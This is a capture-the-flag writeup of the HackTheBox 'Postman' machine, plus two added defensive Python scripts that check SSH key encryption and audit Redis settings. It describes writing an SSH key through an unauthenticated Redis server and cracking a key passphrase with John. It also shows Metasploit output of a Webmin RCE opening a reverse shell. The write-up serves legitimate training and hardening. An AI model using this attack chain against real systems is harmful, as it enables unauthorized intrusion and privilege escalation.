HackTheBox Postman - Writeup
Release Date: 2019/11/02 19:00
# User Part
Starting with an nmap scan gives us the following results:

```text
| 2048 46:83:4f:f1:38:61:c0:1c:74:cb:b5:d1:4a:68:4d:77 (RSA)
| 256 2d:8d:27:d2:df:15:1a:31:53:05:fb:ff:f0:62:26:89 (ECDSA)
|_ 256 ca:7c:82:aa:5a:d3:72:ca:8b:8a:38:3a:80:41:a0:45 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: The Cyber Geek's Personal Website
6379/tcp open redis Redis key-value store
10000/tcp open http MiniServ 1.910 (Webmin httpd)
|_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1).
```
The machine provides two different HTTP servers, one on the default port 80 and another on port 10000. At first sight, port 80 doesn't reveal any useful information; a gobuster scan only shows default directories like images and js. The web server on port 10000 forces us to use HTTPS. Doing so, a Webmin login page is shown, but we don't have any credentials yet. There is another interesting port, 6379/tcp: a Redis key-value store. Using redis-cli we can try to connect to that server:

The Redis server doesn't seem to be password protected! Doing some research, we find an exploit that abuses this fact by storing our SSH public key as a key-value pair and making Redis write its database file to /var/lib/redis/.ssh/authorized_keys. More information can be found here: Redis RCE. To get the paths right, I had to try some default locations and check the currently set values with config get *. With our public key in place, we can now log in as the redis user with our private key. Some basic enumeration of common folders reveals the next step for the user part:
```text
drwxr-xr-x 2 root root 4096 Sep 11 11:28 .
drwxr-xr-x 22 root root 4096 Aug 25 15:03 ..
-rwxr-xr-x 1 Matt Matt 1743 Aug 26 00:11 id_rsa.bak
```
We got a private key, probably belonging to the user Matt found in /etc/passwd. Unfortunately, this key is encrypted, but we can download it using scp and try to crack its passphrase with john:
```text
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 1 for all loaded hashes
Cost 2 (iteration count) is 2 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
Warning: Only 1 candidate left, minimum 4 needed for performance.
1g 0:00:00:15 DONE (2020-02-07 21:20) 0.06583g/s 944153p/s 944153c/s 944153C/s *7¡Vamos!
```
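John's cost line above (KDF/cipher "is 1", i.e. MD5/3DES) is why the passphrase fell in fifteen seconds at roughly 944k candidates per second: the legacy PEM container derives its 3DES key with a single MD5 pass, so every guess costs one hash. As an added example (not code from the writeup's author or from OpenSSH), the following classifier reads only the container header of a private key file and reports which KDF protects it; sweeping backup directories for keys like the id_rsa.bak above is the defender's counterpart to that ls. The sample keys are synthetic header fragments built inline and contain no key material, and the floor of 16 bcrypt rounds is ssh-keygen's default for -a.

```python
"""Classify how an SSH private key file is protected at rest.

Added example for this writeup; not code from the box or from OpenSSH.
The sample keys are constructed header fragments with no key material.
"""
import base64
import re
import struct
from typing import Dict, Optional

BCRYPT_ROUNDS_FLOOR = 16  # ssh-keygen's default for -a


def _ssh_string(b: bytes) -> bytes:
    """Encode a length-prefixed SSH string (uint32 big-endian length + bytes)."""
    return struct.pack(">I", len(b)) + b


def _read_string(buf: bytes, off: int):
    """Decode a length-prefixed SSH string at `off`; return (value, next offset)."""
    (n,) = struct.unpack(">I", buf[off:off + 4])
    return buf[off + 4:off + 4 + n], off + 4 + n


def make_openssh_key_prefix(cipher: bytes, kdf: bytes, rounds: int = 16) -> str:
    """Build only the leading fields of an openssh-key-v1 blob (constructed test input).
    Layout: magic, ciphername, kdfname, kdfoptions (bcrypt: salt + rounds), key count."""
    kdfopts = b"" if kdf == b"none" else _ssh_string(b"\x00" * 16) + struct.pack(">I", rounds)
    blob = (b"openssh-key-v1\x00" + _ssh_string(cipher) + _ssh_string(kdf)
            + _ssh_string(kdfopts) + struct.pack(">I", 1))
    body = base64.b64encode(blob).decode()
    return f"-----BEGIN OPENSSH PRIVATE KEY-----\n{body}\n-----END OPENSSH PRIVATE KEY-----\n"


# Constructed sample of the traditional PEM layout: EVP_BytesToKey with one MD5 pass derives
# the 3DES key, which is the "MD5/3DES" cost john reported. The body is dummy base64, not a key.
LEGACY_3DES_KEY = """-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: DES-EDE3-CBC,0123456789ABCDEF

QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB
-----END RSA PRIVATE KEY-----
"""
MODERN_BCRYPT_KEY = make_openssh_key_prefix(b"aes256-ctr", b"bcrypt", rounds=16)
UNENCRYPTED_KEY = make_openssh_key_prefix(b"none", b"none")


def assess_private_key(pem: str) -> Dict[str, Optional[object]]:
    """Return format, cipher, KDF, bcrypt rounds (if any) and a verdict: ok / weak / unencrypted."""
    lines = [ln.strip() for ln in pem.strip().splitlines()]
    result: Dict[str, Optional[object]] = {"format": None, "cipher": None, "kdf": None, "rounds": None}
    if lines[0] == "-----BEGIN OPENSSH PRIVATE KEY-----":
        blob = base64.b64decode("".join(lines[1:-1]))
        if not blob.startswith(b"openssh-key-v1\x00"):
            raise ValueError("not an openssh-key-v1 blob")
        off = len(b"openssh-key-v1\x00")
        cipher, off = _read_string(blob, off)
        kdf, off = _read_string(blob, off)
        kdfopts, off = _read_string(blob, off)
        result.update(format="openssh-v1", cipher=cipher.decode(), kdf=kdf.decode())
        if kdf == b"bcrypt":
            _salt, o = _read_string(kdfopts, 0)
            (result["rounds"],) = struct.unpack(">I", kdfopts[o:o + 4])
    elif lines[0] == "-----BEGIN ENCRYPTED PRIVATE KEY-----":
        # PKCS#8: PBKDF2 parameters sit inside ASN.1 that this example does not parse.
        result.update(format="pkcs8", kdf="pbkdf2", verdict="review")
        return result
    elif lines[0].startswith("-----BEGIN ") and lines[0].endswith(" PRIVATE KEY-----"):
        result["format"] = "pem"  # traditional PEM, or unencrypted PKCS#8
        m = re.search(r"^DEK-Info:\s*([A-Z0-9-]+),", pem, re.M)
        if "Proc-Type: 4,ENCRYPTED" in pem and m:
            result.update(cipher=m.group(1).lower(), kdf="md5")  # one iteration, no tunable cost
        else:
            result.update(cipher="none", kdf="none")
    else:
        raise ValueError("unsupported key container")

    if result["cipher"] == "none":
        result["verdict"] = "unencrypted"
    elif result["kdf"] == "bcrypt" and result["rounds"] >= BCRYPT_ROUNDS_FLOOR:
        result["verdict"] = "ok"
    else:
        result["verdict"] = "weak"
    return result


if __name__ == "__main__":
    for name, key in (("legacy 3DES", LEGACY_3DES_KEY), ("bcrypt", MODERN_BCRYPT_KEY),
                      ("unencrypted", UNENCRYPTED_KEY)):
        print(name, assess_private_key(key))
```

Anything reported as weak or unencrypted is a candidate for re-encryption with `ssh-keygen -p -o -a 16` (or higher), which moves the key into the openssh-v1 container with bcrypt, and a key that has already been sitting in a world-readable backup should be replaced rather than re-wrapped.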
After changing the key's permissions to 600 (owner read/write only), we can try to use it for SSH authentication as user Matt. Unfortunately, the server immediately closes the connection. Isn't the user allowed to connect via SSH? But we can try something else: logging back in as user redis and running su to switch to user Matt. And indeed, we have credential reuse: the key's passphrase is also his login password. We can now easily read the user flag:
# Root Part
Doing some basic enumeration and looking at the process table (ps aux | grep root), we notice that the Webmin app on port 10000 we found earlier is running as the root user. We will focus on exploiting it.

Since Matt reused his private key's passphrase as his user password, we should try it on the Webmin login page found in the initial enumeration step. Once again, Matt seems to keep only one password in mind. On the start page, we can find the Webmin version: 1.910. Doing some research, we find a remote code execution for this version. We can use the corresponding Metasploit module easily:
```text
[*] Started reverse TCP handler on 10.10.x.x:4444
[+] Session cookie: 56e6a17006481c0f7262e772cb3f7074
[*] Attempting to execute the payload...
[*] Command shell session 1 opened (10.10.x.x:4444 -> 10.10.10.160:43266) at 2020-02-08 16:34:50 -0500
```
# Additional Notes
TIL: Don't let your applications be publicly accessible without requiring authentication.

Also: Run processes with the minimum required permissions only, and try to isolate them from other software and configuration files.
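As an added example for the first lesson, and for the Redis step in the user part, here is a small audit of the settings that made the box's Redis writable by anyone on the network: no `requirepass`, `protected-mode` off, a bind on every interface, and a `CONFIG` command that lets any client point `dir` and `dbfilename` at an arbitrary file. This is not code from the box, from the writeup's author, or from Redis; the two redis.conf snippets and the `config get *` listing are constructed samples that only mirror what the writeup describes. The `enable-protected-configs` directive exists in Redis 7 and later only, so the check treats its absence conservatively.

```python
"""Audit Redis settings for the weaknesses this box exposed: no authentication, reachable
from the network, and a persistence target any client can redirect with CONFIG SET.

Added example for this writeup; not code from the box or from Redis. All three inputs
below are constructed samples.
"""
from typing import Dict, List

# Constructed sample of a redis.conf roughly matching an unauthenticated, exposed instance.
WEAK_CONF = """
bind 0.0.0.0
protected-mode no
port 6379
dir /var/lib/redis
dbfilename dump.rdb
"""

# Constructed sample of a hardened counterpart.
HARDENED_CONF = """
bind 127.0.0.1 ::1
protected-mode yes
port 6379
requirepass CHANGE-ME-to-a-long-random-passphrase
dir /var/lib/redis
dbfilename dump.rdb
# Remove CONFIG from clients entirely; `enable-protected-configs no` (Redis 7+) is the narrower option.
rename-command CONFIG ""
"""

# Constructed sample of `redis-cli config get *` output after the persistence target was
# redirected, i.e. the state the writeup inspected with `config get *`.
TAMPERED_CONFIG_GET = """
1) "dir"
2) "/var/lib/redis/.ssh"
3) "dbfilename"
4) "authorized_keys"
5) "bind"
6) "0.0.0.0"
7) "protected-mode"
8) "no"
9) "requirepass"
10) ""
"""

Conf = Dict[str, List[List[str]]]


def parse_redis_conf(text: str) -> Conf:
    """Map each directive to the list of its argument lists (rename-command may repeat).
    Redis treats only lines that *start* with '#' as comments, so a mid-line '#' is kept."""
    conf: Conf = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split()
        conf.setdefault(parts[0].lower(), []).append(parts[1:])
    return conf


def parse_config_get(text: str) -> Conf:
    """Turn redis-cli's numbered key/value listing into the same structure as parse_redis_conf."""
    values: List[str] = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        _, _, rest = line.partition(") ")
        values.append(rest.strip().strip('"'))
    return {k.lower(): [v.split()] for k, v in zip(values[0::2], values[1::2])}


def audit(conf: Conf) -> List[str]:
    """Return one finding per weak setting; an empty list means nothing was flagged."""
    def first(directive: str, default: List[str]) -> List[str]:
        vals = conf.get(directive)
        return vals[0] if vals and vals[0] else default

    findings: List[str] = []
    bind = first("bind", [])  # no bind directive means listening on every interface
    if not bind or any(a in ("0.0.0.0", "*", "::") for a in bind):
        findings.append("bind: reachable on all interfaces")
    if first("protected-mode", ["yes"])[0].lower() != "yes":
        findings.append("protected-mode: disabled")
    if not first("requirepass", []):
        findings.append("requirepass: no password required")
    disabled = {a[0].upper() for a in conf.get("rename-command", [])
                if len(a) >= 2 and a[1] in ('""', "''")}
    protected = first("enable-protected-configs", ["unset"])[0].lower()
    # Redis 7 blocks CONFIG SET dir/dbfilename by default; older releases have no such switch,
    # so a conf that neither renames CONFIG away nor states the setting is flagged conservatively.
    if "CONFIG" not in disabled and protected != "no":
        findings.append("CONFIG: dir/dbfilename changeable at runtime by any connected client")
    dir_ = first("dir", ["./"])[0]
    dbfile = first("dbfilename", ["dump.rdb"])[0]
    if ".ssh" in dir_.split("/") or not dbfile.endswith(".rdb"):
        findings.append(f"persistence target looks redirected: {dir_}/{dbfile}")
    return findings


if __name__ == "__main__":
    for name, conf in (("weak redis.conf", parse_redis_conf(WEAK_CONF)),
                       ("hardened redis.conf", parse_redis_conf(HARDENED_CONF)),
                       ("live config get *", parse_config_get(TAMPERED_CONFIG_GET))):
        print(f"{name}: {audit(conf) or ['no findings']}")
```

The hardened sample yields no findings, the weak one four, and the tampered listing five, including the redirected `dir`/`dbfilename` pair, which is the same view the writeup obtained with `config get *`. Feeding that listing through `parse_config_get` on a live host therefore detects an instance whose persistence target has already been moved, not just one that could be.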